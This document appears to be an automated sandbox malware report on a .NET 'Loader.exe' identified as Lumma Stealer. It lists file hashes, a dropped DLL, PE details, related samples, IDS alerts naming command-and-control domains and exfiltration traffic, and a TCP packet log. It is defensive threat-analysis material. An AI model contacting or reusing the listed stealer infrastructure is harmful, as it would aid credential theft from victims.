                                                                                                                                                                                                                                                                XYQ1pqHNiT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                GHXsFkoroU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                5Z19n7XRT1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106

                                                                                                                                                                                                                                                                ASNs

                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                AKAMAI-ASN1EUiien1HBbB3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                oe9KS7ZHUc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                MPgkx6bQIQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                SQHE4Hsjo6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                XYQ1pqHNiT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                GHXsFkoroU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                5Z19n7XRT1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                3LUyRfIoKs.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                CLOUDFLARENETUSCrosshair-X.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                                                setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 172.67.165.214
                                                                                                                                                                                                                                                                !Set-up..exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                • 172.67.75.40
                                                                                                                                                                                                                                                                !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                • 104.26.3.16
                                                                                                                                                                                                                                                                ZZ2sTsJFrt.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                                                • 104.21.38.84
                                                                                                                                                                                                                                                                FB.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 104.17.25.14
                                                                                                                                                                                                                                                                http://prowebideas.com/dsfdgfhgdfsdfdgfhgdrwet/gdfsdfdgfhgfgdfsdfdgfh/gfsdfdgfhgfgdfsdfdgfhgdfsdfdgfhGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 104.26.9.163
                                                                                                                                                                                                                                                                http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=hGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 104.17.25.14
                                                                                                                                                                                                                                                                Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 104.21.87.112
                                                                                                                                                                                                                                                                test5.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                                                                                                                                                                                • 104.21.34.5

                                                                                                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                a0e9f5d64349fb13191bc781f81f42e1Crosshair-X.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                !Set-up..exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                iien1HBbB3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                SgMuuLxOCJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                oe9KS7ZHUc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                MPgkx6bQIQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                SQHE4Hsjo6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                                                • 23.55.153.106

                                                                                                                                                                                                                                                                Dropped Files

                                                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Loader.exe.log

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):42
                                                                                                                                                                                                                                                                Entropy (8bit):4.0050635535766075
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                                                                                                                                                                                                                MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                                                                                                                                                                                                                SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                                                                                                                                                                                                                SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                                                                                                                                                                                                                SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\gdi32.dll

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):650240
                                                                                                                                                                                                                                                                Entropy (8bit):7.116623244679264
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12288:SYJ4YcxYAzZL8kZIOWhbN4ddlannT5EbJ+vMvb4Yw8kU0khma7Fk:SYGYYlFL8ekmd+Tiaa
                                                                                                                                                                                                                                                                MD5:037BF337C4DE4BC965E3200BEB1A5BE8
                                                                                                                                                                                                                                                                SHA1:317DC2FFCA68CF71652CFFE75D9D2A341A09CDA8
                                                                                                                                                                                                                                                                SHA-256:29C961EE9F77637C881D9193C6499A84B1320372F3EDC9B8337AB03FB8B8F589
                                                                                                                                                                                                                                                                SHA-512:10767A9B988843D5ED27C6509CE8801A2A604C5298CD602B4D26E1AB0957E837E1531F60DC37B3EC1DE7EE0A1378E2250D3D737E58926F4D4B0E7CD1FB8275D9
                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........b.....................A..................{w....................................................Rich...........................PE..L.....mg...........!.........h......D........................................ ............@.............................|...<...P...............................8*..\...............................x...@...............T............................text...H........................... ..`.rdata...e.......f..................@..@.data...............................@....reloc..8*.......,..................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                Static File Info

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                Entropy (8bit):7.109963399573792
                                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                                                                File name:Loader.exe
                                                                                                                                                                                                                                                                File size:662'016 bytes
                                                                                                                                                                                                                                                                MD5:2ec18b257662dd107ae84263ecd2e5c1
                                                                                                                                                                                                                                                                SHA1:ce2efa8394c35b8da16428b10ece4a856c53dd1f
                                                                                                                                                                                                                                                                SHA256:539f0617a85a7a0773cf9e36d803c1a8ddf5c69dc003c80c1f3afac147b47554
                                                                                                                                                                                                                                                                SHA512:6cf6f83dbaca7f218f6add89de942bc6a8d83fef9ccbbb3f3ef3c03bba4233a25b18f1bc392da27b37b88bb649fecc7c05ed28a9dcf849de957103f03fa63342
                                                                                                                                                                                                                                                                SSDEEP:12288:xI6tpbrZqB16QBXv9trocVyiBFAMyhZVUEz4Pjt/ax7OA2:xIMH6JjocVy+yhZVUEz4PAx7O
                                                                                                                                                                                                                                                                TLSH:74E44A6F977BF209F04A0070A59A367B5DF4EEA5E103C8F206C4E9676066861DFECD12
                                                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....mg..............0.............r@... ...@....@.. ....................................@................................

                                                                                                                                                                                                                                                                File Icon

                                                                                                                                                                                                                                                                Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                                                Static PE Info

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Entrypoint:0x404072
                                                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                Subsystem:windows cui
                                                                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                Time Stamp:0x676DD9C0 [Thu Dec 26 22:33:36 2024 UTC]
                                                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                                                OS Version Major:4
                                                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                                                File Version Major:4
                                                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                                                jmp dword ptr [00402000h]
                                                                                                                                                                                                                                                                jnl 00007FC2C0EA7522h
                                                                                                                                                                                                                                                                cmp cl, dl

                                                                                                                                                                                                                                                                Data Directories

                                                                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x40200x4f.text
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xa40000x664.rsrc
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xa60000xc.reloc
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                Sections

                                                                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                .text0x20000xa0c780xa0e00163959917283545171c710f544f483d0False0.4664432789432789data7.116320721076053IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                .rsrc0xa40000x6640x80002908315fb791e6119b5131b5b26370cFalse0.35302734375data3.6099202773203682IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                .reloc0xa60000xc0x200b8621a767d2dd3d37ce617bafd19944bFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                Resources

                                                                                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                RT_VERSION0xa40900x3d4data0.42551020408163265
                                                                                                                                                                                                                                                                RT_MANIFEST0xa44740x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                                                                                                                                                Imports

                                                                                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                                                                                mscoree.dll_CorExeMain

                                                                                                                                                                                                                                                                Network Behavior

                                                                                                                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                2024-12-28T22:05:02.286296+01002058584ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz)1192.168.2.5540971.1.1.153UDP
                                                                                                                                                                                                                                                                2024-12-28T22:05:02.454948+01002058586ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz)1192.168.2.5519531.1.1.153UDP
                                                                                                                                                                                                                                                                2024-12-28T22:05:02.599824+01002058588ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz)1192.168.2.5650861.1.1.153UDP
                                                                                                                                                                                                                                                                2024-12-28T22:05:02.740771+01002058580ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz)1192.168.2.5509011.1.1.153UDP
                                                                                                                                                                                                                                                                2024-12-28T22:05:02.884238+01002058590ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz)1192.168.2.5650251.1.1.153UDP
                                                                                                                                                                                                                                                                2024-12-28T22:05:03.048763+01002058572ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz)1192.168.2.5545201.1.1.153UDP
                                                                                                                                                                                                                                                                2024-12-28T22:05:03.188045+01002058576ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz)1192.168.2.5529931.1.1.153UDP
                                                                                                                                                                                                                                                                2024-12-28T22:05:03.427192+01002058578ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz)1192.168.2.5575641.1.1.153UDP
                                                                                                                                                                                                                                                                2024-12-28T22:05:05.268137+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54970423.55.153.106443TCP
                                                                                                                                                                                                                                                                2024-12-28T22:05:06.050526+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.54970423.55.153.106443TCP
                                                                                                                                                                                                                                                                2024-12-28T22:05:07.752125+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549705172.67.157.254443TCP
                                                                                                                                                                                                                                                                2024-12-28T22:05:08.524544+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549705172.67.157.254443TCP
                                                                                                                                                                                                                                                                2024-12-28T22:05:08.524544+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705172.67.157.254443TCP
                                                                                                                                                                                                                                                                2024-12-28T22:05:09.767020+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549706172.67.157.254443TCP
                                                                                                                                                                                                                                                                2024-12-28T22:05:10.540001+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549706172.67.157.254443TCP
                                                                                                                                                                                                                                                                2024-12-28T22:05:10.540001+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549706172.67.157.254443TCP
                                                                                                                                                                                                                                                                2024-12-28T22:05:12.146215+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549707172.67.157.254443TCP
                                                                                                                                                                                                                                                                2024-12-28T22:05:14.544670+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549708172.67.157.254443TCP
                                                                                                                                                                                                                                                                2024-12-28T22:05:16.862818+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549709172.67.157.254443TCP
                                                                                                                                                                                                                                                                2024-12-28T22:05:19.402133+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549710172.67.157.254443TCP
                                                                                                                                                                                                                                                                2024-12-28T22:05:20.182376+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549710172.67.157.254443TCP
                                                                                                                                                                                                                                                                2024-12-28T22:05:21.574600+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549713172.67.157.254443TCP
                                                                                                                                                                                                                                                                2024-12-28T22:05:23.705985+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549716172.67.157.254443TCP
                                                                                                                                                                                                                                                                2024-12-28T22:05:24.619897+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549716172.67.157.254443TCP

                                                                                                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                                                                                                TCP Packets

                                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:03.782820940 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:03.782870054 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:03.782933950 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:03.784315109 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:03.784327984 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:05.268058062 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:05.268136978 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:05.271755934 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:05.271765947 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:05.271979094 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:05.316437960 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:05.335741997 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:05.379373074 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:06.050564051 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:06.050584078 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:06.050610065 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:06.050626040 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:06.050645113 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:06.050667048 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:06.050678968 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:06.050705910 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:06.050730944 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:06.247848988 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:06.247893095 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:06.247950077 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:06.247961044 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:06.248004913 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:06.278573990 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:06.278605938 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:06.278660059 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:06.278664112 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:06.278678894 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:06.278693914 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:06.278734922 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:06.280495882 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:06.280514956 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:06.280524015 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:06.280529976 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:06.487510920 CET49705443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:06.487603903 CET44349705172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:06.487683058 CET49705443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:06.488056898 CET49705443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:06.488095045 CET44349705172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:07.752032995 CET44349705172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:07.752125025 CET49705443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:07.754971981 CET49705443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:07.754995108 CET44349705172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:07.755263090 CET44349705172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:07.756400108 CET49705443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:07.756438971 CET49705443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:07.756489038 CET44349705172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:08.524539948 CET44349705172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:08.524632931 CET44349705172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:08.524692059 CET49705443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:08.526916981 CET49705443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:08.526969910 CET44349705172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:08.527002096 CET49705443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:08.527015924 CET44349705172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:08.552859068 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:08.552896023 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:08.552970886 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:08.553237915 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:08.553247929 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:09.766911030 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:09.767019987 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:09.768301010 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:09.768309116 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:09.768549919 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:09.769783974 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:09.769809008 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:09.769845963 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.540013075 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.540059090 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.540105104 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.540133953 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.540178061 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.540225029 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.540225029 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.540261984 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.540308952 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.548290968 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.556515932 CET44349706172.67.157.254192.168.2.5
